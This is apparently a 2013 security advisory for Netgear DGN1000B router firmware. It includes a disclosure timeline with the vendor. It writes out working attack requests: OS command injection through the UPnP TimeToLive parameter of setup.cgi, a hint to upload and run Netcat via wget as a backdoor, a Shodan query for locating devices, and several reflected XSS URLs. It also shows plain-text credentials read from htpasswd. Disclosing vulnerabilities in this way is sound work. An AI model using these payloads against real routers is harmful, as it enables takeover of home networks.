Device Name: DGN1000B Vendor: Netgear ============ Vulnerable Firmware Releases: ============ Firmwareversion: V1.1.00.24 Firmwareversion: V1.1.00.45 Download: http://downloadcenter.netgear.com/de/product/DGN1000 ============ Device Description: ============ The N150 Wireless ADSL2+ Modem Router DGN1000 provides you with an easy and secure way to set up a wireless home network with fast access to the Internet over a high-speed digital subscriber line (DSL). The N150 Modem Router has a built-in DSL modem and is compatible with all major DSL Internet service providers. The security features let you block unsafe Internet content and applications, and protect the devices that you connect to your home network. Source: http://support.netgear.com/product/DGN1000 ============ Shodan Torks ============ Shodan Search: NETGEAR DGN1000 ============ Vulnerability Overview: ============ * OS Command Injection in the UPNP configuration: The vulnerability is caused by missing input validation in the TimeToLive parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device. Param: TimeToLive POST /setup.cgi HTTP/1.1 Host: 192.168.178.188 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.188/setup.cgi?next_file=upnp.htm Authorization: Basic XXX Content-Type: application/x-www-form-urlencoded Content-Length: 185 Connection: close UPnP=UPnP&AdverTime=30&TimeToLive=`%20COMMAND%20`&save=+Anwenden&todo=save&this_file=upnp.htm&next_file=upnp.htm&h_UPnP=enable&hiddenAdverTime=30&hiddenTimeToLive=4 Change the Request Methode from HTTP Post to HTTP GET: http://192.168.178.188/setup.cgi?UPnP=UPnP&AdverTime=30&TimeToLive=`%20COMMAND%20`&save=+Anwenden&todo=save&this_file=upnp.htm&next_file=upnp.htm&h_UPnP=enable&hiddenAdverTime=30&hiddenTimeToLive=4 It is possible to cross compile Netcat and upload it via wget, adjust the permissions and execute it. Have phun ;) Sources including needed toolchain: http://kb.netgear.com/app/answers/detail/a_id/2649 direct download: http://www.downloads.netgear.com/files/GPL/DGN1000B_VB1.00.45_GR_src.tar... Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN1000B-os-command-wget-check.png Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN1000B-r00ted.png * Insecure Cryptographic Storage: There is no password hashing implemented and so it is saved in plain text on the system: cat /tmp/etc/htpasswd admin:password * XSS Injecting scripts into the following parameters reveals that these parameters are not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code. -> Sicherheit -> Dienste -> neuen Dienst anlegen -> Dienstname Param: service_name http://192.168.178.188/setup.cgi?service_name=%22%3E%3Cimg%20src=%220%22%20onerror=alert%282%29%3E&svc_type=tcp&serv_sport=1&serv_endport=2&save=Anwenden&todo=save&h_svc_type=tcp&edit=1&h_ruleSelect=0&this_file=servinfo.htm&next_file=fw_serv.htm -> WLAN -> Zugriffsliste anpassen -> Hinzufgen -> Gertename Param: device http://192.168.178.188/setup.cgi?accessLimit=accessLimit&device=%22%3E%3Cimg+src%3D%220%22+onerror=alert(2)>&wirelist_mac=01-11-22-33-44-66&h_accessLimit=enable&h_ruleSelect=0&todo=addmanual&this_file=m_access.htm&next_file=m_access.htm Param: ssid_num http://192.168.178.188/setup.cgi?next_file=adv_wireless.htm&ssid_num=a%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&flag=1 Param: h_skeyword http://192.168.178.188/setup.cgi?skeyword=1&cfKeyWord_Domain=&KeyWordList=0&todo=delete&this_file=keyword.htm&next_file=keyword.htm&h_skeyword=115bcf%22%3E%3Cscript%3Ealert%281%29%3C/script%3Edc575b170bc38bebe&h_KeyWordList=&h_ruleSelect=0&h_trustipenable=disable&c4_Trusted_IPAddress= Param: cfKeyWord_Domain http://192.168.178.188/setup.cgi?skeyword=1&cfKeyWord_Domain=5d0a9%3Cscript%3Ealert%281%29%3C/script%3E&todo=addkeyword&this_file=keyword.htm&next_file=keyword.htm&h_skeyword=1&h_KeyWordList=&h_ruleSelect=&h_trustipenable=disable&c4_Trusted_IPAddress= ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de Advisory URL: http://www.s3cur1ty.de/m1adv2013-005 Twitter: @s3cur1ty_de ============ Time Line: ============ October 2012 - discovered vulnerability 15.10.2012 - Privately reported all details to vendor via email 23.10.2012 - Privately reported all details to vendor via webinterface 24.10.2012 - Netgear replied to forward the details internally 31.10.2012 - Netgear closes the case 31.10.2012 - Requested more details why the case is now closed. 31.10.2012 - Netgear responded that they will check the state of the case 06.11.2012 - Netgear requested the Serial Number of the device 08.11.2012 - Responded with the Serial Number 13.11.2012 - something goes on - I got a product registration confirmation 03.12.2012 - Case closed by Netgear - No new firmware available 16.01.2013 - Netgear contacted me again requesting to check a Beta version 22.01.2013 - Tested Beta Firmware and gave feedback to vendor 06.02.2013 - public release ===================== Advisory end =====================